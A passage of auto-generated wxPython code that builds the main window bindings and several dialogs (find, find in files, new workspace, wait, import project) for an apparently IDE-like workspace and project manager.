wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer2431.AddGrowableCol( 0 ) fgSizer2431.AddGrowableRow( 0 ) fgSizer2431.SetFlexibleDirection( wx.BOTH ) fgSizer2431.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.auxOutput = wx.TextCtrl( self.m_aux_output_pane, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_CHARWRAP|wx.TE_MULTILINE|wx.TE_READONLY ) fgSizer2431.Add( self.auxOutput, 0, wx.ALL|wx.EXPAND, 5 ) self.m_aux_output_pane.SetSizer( fgSizer2431 ) self.m_aux_output_pane.Layout() fgSizer2431.Fit( self.m_aux_output_pane ) self.m_aux_panes.AddPage( self.m_aux_output_pane, u"output", False ) self.m_searchPane = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer53 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer53.AddGrowableCol( 0 ) fgSizer53.AddGrowableRow( 0 ) fgSizer53.SetFlexibleDirection( wx.BOTH ) fgSizer53.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_searchList = wx.ListCtrl( self.m_searchPane, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT|wx.LC_SINGLE_SEL ) fgSizer53.Add( self.m_searchList, 0, wx.ALL|wx.EXPAND, 5 ) self.m_searchPane.SetSizer( fgSizer53 ) self.m_searchPane.Layout() fgSizer53.Fit( self.m_searchPane ) self.m_aux_panes.AddPage( self.m_searchPane, u"search", False ) self.m_mgr.Update() self.Centre( wx.BOTH ) # Connect Events self.Bind( wx.EVT_CLOSE, self.OnSalir ) self.Bind( wx.EVT_MENU, self.OnNewWorkspace, id = self.newWorkspace.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.newProject.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.newProject.GetId() ) self.Bind( wx.EVT_MENU, self.OnOpenWorkspace, id = self.openWorkspace.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.openProject.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.openProject.GetId() ) self.Bind( wx.EVT_MENU, self.OnCloseWorkspace, id = self.m_menuItem26.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateCloseWorkspace, id = self.m_menuItem26.GetId() ) self.Bind( wx.EVT_MENU, self.OnCloseProject, id = self.m_menuItem27.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateCloseProject, id = self.m_menuItem27.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.importProject.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.importProject.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.saveWorkspace.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.saveWorkspace.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.saveProject.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.saveProject.GetId() ) self.Bind( wx.EVT_MENU, self.OnSalir, id = self.quit.GetId() ) self.Bind( wx.EVT_MENU, self.OnEditUndo, id = self.undo.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateEditUndo, id = self.undo.GetId() ) self.Bind( wx.EVT_MENU, self.OnEditRedo, id = self.redo.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateEditRedo, id = self.redo.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.copy.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.copy.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.cut.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.cut.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.paste.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.paste.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.delete.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.delete.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editOpen.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editOpen.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editContext.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editContext.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editUserSections.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editUserSections.GetId() ) self.Bind( wx.EVT_MENU, self.redirectedToFocus, id = self.editProperties.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.redirectedToFocus4Enabled, id = self.editProperties.GetId() ) self.Bind( wx.EVT_MENU, self.OnEditPreferences, id = self.preferences.GetId() ) self.Bind( wx.EVT_MENU, self.OnFindInFiles, id = self.findInFiles.GetId() ) self.Bind( wx.EVT_MENU, self.OnResetPerpective, id = self.m_menuItem72.GetId() ) self.Bind( wx.EVT_MENU, self.OnToggleViewsPanes, id = self.m_views.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateToggleViewsPanes, id = self.m_views.GetId() ) self.Bind( wx.EVT_MENU, self.OnToggleAuxiliarPanes, id = self.m_auxiliarPanes.GetId() ) self.Bind( wx.EVT_UPDATE_UI, self.OnUpdateToggleAuxiliarPanes, id = self.m_auxiliarPanes.GetId() ) self.Bind( wx.EVT_MENU, self.OnSettingsBuildTools, id = self.compilerSettings.GetId() ) self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGED, self.OnViewPageChanged ) self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGING, self.OnViewPageChanging ) self.viewBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnViewPageClosed ) self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGED, self.OnPageChanged ) self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CHANGING, self.OnPageChanging ) self.docBook.Bind( wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnClosePane ) self.m_searchList.Bind( wx.EVT_LIST_ITEM_SELECTED, self.OnSelectSearchItem ) def __del__( self ): self.m_mgr.UnInit() # Virtual event handlers, overide them in your derived class def OnSalir( self, event ): event.Skip() def OnNewWorkspace( self, event ): event.Skip() def redirectedToFocus( self, event ): event.Skip() def redirectedToFocus4Enabled( self, event ): event.Skip() def OnOpenWorkspace( self, event ): event.Skip() def OnCloseWorkspace( self, event ): event.Skip() def OnUpdateCloseWorkspace( self, event ): event.Skip() def OnCloseProject( self, event ): event.Skip() def OnUpdateCloseProject( self, event ): event.Skip() def OnEditUndo( self, event ): event.Skip() def OnUpdateEditUndo( self, event ): event.Skip() def OnEditRedo( self, event ): event.Skip() def OnUpdateEditRedo( self, event ): event.Skip() def OnEditPreferences( self, event ): event.Skip() def OnFindInFiles( self, event ): event.Skip() def OnResetPerpective( self, event ): event.Skip() def OnToggleViewsPanes( self, event ): event.Skip() def OnUpdateToggleViewsPanes( self, event ): event.Skip() def OnToggleAuxiliarPanes( self, event ): event.Skip() def OnUpdateToggleAuxiliarPanes( self, event ): event.Skip() def OnSettingsBuildTools( self, event ): event.Skip() def OnViewPageChanged( self, event ): event.Skip() def OnViewPageChanging( self, event ): event.Skip() def OnViewPageClosed( self, event ): event.Skip() def OnPageChanged( self, event ): event.Skip() def OnPageChanging( self, event ): event.Skip() def OnClosePane( self, event ): event.Skip() def OnSelectSearchItem( self, event ): event.Skip() ########################################################################### ## Class FindText ########################################################################### class FindText ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Find ", pos = wx.DefaultPosition, size = wx.Size( 331,118 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer68 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer68.AddGrowableCol( 0 ) fgSizer68.AddGrowableRow( 0 ) fgSizer68.AddGrowableRow( 2 ) fgSizer68.SetFlexibleDirection( wx.BOTH ) fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer68.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer70 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer70.AddGrowableCol( 1 ) fgSizer70.AddGrowableRow( 0 ) fgSizer70.SetFlexibleDirection( wx.BOTH ) fgSizer70.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText34 = wx.StaticText( self, wx.ID_ANY, u"search:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText34.Wrap( -1 ) fgSizer70.Add( self.m_staticText34, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_search_string = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER ) fgSizer70.Add( self.m_search_string, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer68.Add( fgSizer70, 1, wx.EXPAND|wx.RIGHT|wx.LEFT, 5 ) fgSizer68.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer159.AddGrowableCol( 1 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer159.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer12 = wx.StdDialogButtonSizer() self.m_sdbSizer12OK = wx.Button( self, wx.ID_OK ) m_sdbSizer12.AddButton( self.m_sdbSizer12OK ) self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel ) m_sdbSizer12.Realize(); fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 ) fgSizer68.Add( fgSizer159, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer68 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_search_string.Bind( wx.EVT_TEXT_ENTER, self.OnOK ) self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel ) self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() def OnCancel( self, event ): event.Skip() ########################################################################### ## Class FindInFiles ########################################################################### class FindInFiles ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Find in files", pos = wx.DefaultPosition, size = wx.Size( 436,256 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer68 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer68.AddGrowableCol( 0 ) fgSizer68.AddGrowableRow( 1 ) fgSizer68.SetFlexibleDirection( wx.BOTH ) fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer70 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer70.AddGrowableCol( 1 ) fgSizer70.AddGrowableRow( 0 ) fgSizer70.SetFlexibleDirection( wx.BOTH ) fgSizer70.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText34 = wx.StaticText( self, wx.ID_ANY, u"search:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText34.Wrap( -1 ) fgSizer70.Add( self.m_staticText34, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_search_string = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER ) fgSizer70.Add( self.m_search_string, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer68.Add( fgSizer70, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 ) fgSizer61 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer61.AddGrowableCol( 0 ) fgSizer61.AddGrowableCol( 1 ) fgSizer61.AddGrowableRow( 0 ) fgSizer61.SetFlexibleDirection( wx.BOTH ) fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) sbSizer6 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"options" ), wx.VERTICAL ) self.m_checkBox4 = wx.CheckBox( sbSizer6.GetStaticBox(), wx.ID_ANY, u"&match case", wx.DefaultPosition, wx.DefaultSize, 0 ) sbSizer6.Add( self.m_checkBox4, 0, wx.ALL, 5 ) self.m_checkBox5 = wx.CheckBox( sbSizer6.GetStaticBox(), wx.ID_ANY, u"regular expression", wx.DefaultPosition, wx.DefaultSize, 0 ) sbSizer6.Add( self.m_checkBox5, 0, wx.ALL, 5 ) fgSizer61.Add( sbSizer6, 1, wx.EXPAND, 5 ) sbSizer7 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"scope" ), wx.VERTICAL ) self.m_radioBtn1 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"open files", wx.DefaultPosition, wx.DefaultSize, 0 ) sbSizer7.Add( self.m_radioBtn1, 0, wx.ALL, 5 ) self.m_radioBtn2 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"project files", wx.DefaultPosition, wx.DefaultSize, 0 ) sbSizer7.Add( self.m_radioBtn2, 0, wx.ALL, 5 ) self.m_radioBtn3 = wx.RadioButton( sbSizer7.GetStaticBox(), wx.ID_ANY, u"workspace files", wx.DefaultPosition, wx.DefaultSize, 0 ) sbSizer7.Add( self.m_radioBtn3, 0, wx.ALL, 5 ) fgSizer61.Add( sbSizer7, 1, wx.EXPAND, 5 ) fgSizer68.Add( fgSizer61, 1, wx.EXPAND|wx.ALL, 5 ) fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer159.AddGrowableCol( 1 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer159.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer12 = wx.StdDialogButtonSizer() self.m_sdbSizer12OK = wx.Button( self, wx.ID_OK ) m_sdbSizer12.AddButton( self.m_sdbSizer12OK ) self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel ) m_sdbSizer12.Realize(); fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 ) fgSizer68.Add( fgSizer159, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer68 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_search_string.Bind( wx.EVT_TEXT_ENTER, self.OnOK ) self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel ) self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnOK( self, event ): event.Skip() def OnCancel( self, event ): event.Skip() ########################################################################### ## Class NewWorkspace ########################################################################### class NewWorkspace ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"New workspace", pos = wx.DefaultPosition, size = wx.Size( 429,401 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer172 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer172.AddGrowableCol( 0 ) fgSizer172.AddGrowableRow( 1 ) fgSizer172.SetFlexibleDirection( wx.BOTH ) fgSizer172.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer5 = wx.FlexGridSizer( 5, 2, 0, 0 ) fgSizer5.AddGrowableCol( 1 ) fgSizer5.SetFlexibleDirection( wx.BOTH ) fgSizer5.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText2 = wx.StaticText( self, wx.ID_ANY, u"Name:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText2.Wrap( -1 ) fgSizer5.Add( self.m_staticText2, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl1 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer5.Add( self.m_textCtrl1, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, u"Base directory:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) fgSizer5.Add( self.m_staticText3, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer29 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer29.AddGrowableCol( 0 ) fgSizer29.SetFlexibleDirection( wx.BOTH ) fgSizer29.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_textCtrl9 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer29.Add( self.m_textCtrl9, 0, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_bpButton3 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FOLDER_OPEN, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer29.Add( self.m_bpButton3, 0, wx.ALL, 5 ) fgSizer5.Add( fgSizer29, 1, wx.EXPAND, 5 ) fgSizer172.Add( fgSizer5, 1, wx.EXPAND, 5 ) sbSizer9 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Documentation" ), wx.VERTICAL ) self.m_richText3 = wx.richtext.RichTextCtrl( sbSizer9.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.HSCROLL|wx.SUNKEN_BORDER|wx.VSCROLL|wx.WANTS_CHARS ) sbSizer9.Add( self.m_richText3, 1, wx.EXPAND|wx.ALL, 5 ) fgSizer172.Add( sbSizer9, 1, wx.EXPAND, 5 ) fgSizer22 = wx.FlexGridSizer( 1, 3, 0, 0 ) fgSizer22.AddGrowableCol( 0 ) fgSizer22.SetFlexibleDirection( wx.BOTH ) fgSizer22.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer22.Add( self.m_info, 0, wx.ALL, 5 ) self.m_button5 = wx.Button( self, wx.ID_CANCEL, u"Cancel", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer22.Add( self.m_button5, 0, wx.ALL, 5 ) self.m_button6 = wx.Button( self, wx.ID_OK, u"Ok", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_button6.SetDefault() fgSizer22.Add( self.m_button6, 0, wx.ALL, 5 ) fgSizer172.Add( fgSizer22, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer172 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnChangeWorkspaceName ) self.m_bpButton3.Bind( wx.EVT_BUTTON, self.OnChooseDir ) self.m_button6.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnChangeWorkspaceName( self, event ): event.Skip() def OnChooseDir( self, event ): event.Skip() def OnOK( self, event ): event.Skip() ########################################################################### ## Class Wait ########################################################################### class Wait ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Please wait while processing files", pos = wx.DefaultPosition, size = wx.Size( 553,186 ), style = wx.CAPTION|wx.RESIZE_BORDER|wx.STAY_ON_TOP ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetExtraStyle( self.GetExtraStyle() | wx.WS_EX_PROCESS_IDLE|wx.WS_EX_PROCESS_UI_UPDATES ) fgSizer224 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer224.AddGrowableCol( 0 ) fgSizer224.AddGrowableRow( 0 ) fgSizer224.AddGrowableRow( 2 ) fgSizer224.SetFlexibleDirection( wx.BOTH ) fgSizer224.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer224.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer225 = wx.FlexGridSizer( 1, 3, 0, 0 ) fgSizer225.AddGrowableCol( 1 ) fgSizer225.SetFlexibleDirection( wx.BOTH ) fgSizer225.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer225.AddSpacer( ( 10, 0), 1, wx.EXPAND, 5 ) self.m_text = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY|wx.NO_BORDER ) self.m_text.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOWFRAME ) ) fgSizer225.Add( self.m_text, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 ) fgSizer225.AddSpacer( ( 10, 0), 1, wx.EXPAND, 5 ) fgSizer224.Add( fgSizer225, 1, wx.EXPAND, 5 ) fgSizer224.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer224 ) self.Layout() self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class Working ########################################################################### class Working ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 236,171 ), style = wx.FRAME_FLOAT_ON_PARENT|wx.FRAME_NO_TASKBAR ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer242 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer242.AddGrowableCol( 0 ) fgSizer242.AddGrowableRow( 0 ) fgSizer242.AddGrowableRow( 2 ) fgSizer242.SetFlexibleDirection( wx.BOTH ) fgSizer242.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_animCtrl = wx.animate.AnimationCtrl( self, wx.ID_ANY, wx.animate.NullAnimation, wx.DefaultPosition, wx.DefaultSize, wx.animate.AC_DEFAULT_STYLE|wx.NO_BORDER ) self.m_animCtrl.SetInactiveBitmap( wx.NullBitmap ) fgSizer242.Add( self.m_animCtrl, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 ) self.m_staticText112 = wx.StaticText( self, wx.ID_ANY, u"Please wait ...", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText112.Wrap( -1 ) fgSizer242.Add( self.m_staticText112, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer242.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer242 ) self.Layout() self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class ImportProject ########################################################################### class ImportProject ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Import project", pos = wx.DefaultPosition, size = wx.Size( 429,339 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer178 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer178.AddGrowableCol( 0 ) fgSizer178.AddGrowableRow( 1 ) fgSizer178.SetFlexibleDirection( wx.BOTH ) fgSizer178.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer233 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer233.AddGrowableCol( 1 ) fgSizer233.SetFlexibleDirection( wx.BOTH ) fgSizer233.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText110 = wx.StaticText( self, wx.ID_ANY, u"base directory", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText110.Wrap( -1 ) fgSizer233.Add( self.m_staticText110, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_dirPicker2 = wx.DirPickerCtrl( self, wx.ID_ANY, wx.EmptyString, u"Select a folder", wx.DefaultPosition, wx.DefaultSize, wx.DIRP_DEFAULT_STYLE|wx.DIRP_DIR_MUST_EXIST|wx.DIRP_USE_TEXTCTRL ) fgSizer233.Add( self.m_dirPicker2, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer178.Add( fgSizer233, 1, wx.EXPAND, 5 ) self.m_choicebook4 = wx.Choicebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel29 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer183 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer183.AddGrowableCol( 0 ) fgSizer183.AddGrowableRow( 0 ) fgSizer183.SetFlexibleDirection( wx.BOTH ) fgSizer183.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) m_checkList6Choices = [] self.m_checkList6 = wx.CheckListBox( self.m_panel29, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_checkList6Choices, 0 ) fgSizer183.Add( self.m_checkList6, 0, wx.ALL|wx.EXPAND, 5 ) self.m_panel29.SetSizer( fgSizer183 ) self.m_panel29.Layout() fgSizer183.Fit( self.m_panel29 ) self.m_choicebook4.AddPage( self.m_panel29, u"python", False ) self.m_panel28 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer182 = wx.FlexGridSizer( 0, 2, 0, 0 ) fgSizer182.SetFlexibleDirection( wx.BOTH ) fgSizer182.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_panel28.SetSizer( fgSizer182 ) self.m_panel28.Layout() fgSizer182.Fit( self.m_panel28 ) self.m_choicebook4.AddPage( self.m_panel28, u"c++", False ) fgSizer178.Add( self.m_choicebook4, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer159.AddGrowableCol( 1 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer159.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer12 = wx.StdDialogButtonSizer() self.m_sdbSizer12OK = wx.Button( self, wx.ID_OK ) m_sdbSizer12.AddButton( self.m_sdbSizer12OK ) self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel ) m_sdbSizer12.Realize(); fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 ) fgSizer178.Add( fgSizer159, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer178 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel ) self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnCancel( self, event ): event.Skip() def OnOK( self, event ): event.Skip()
0.071267
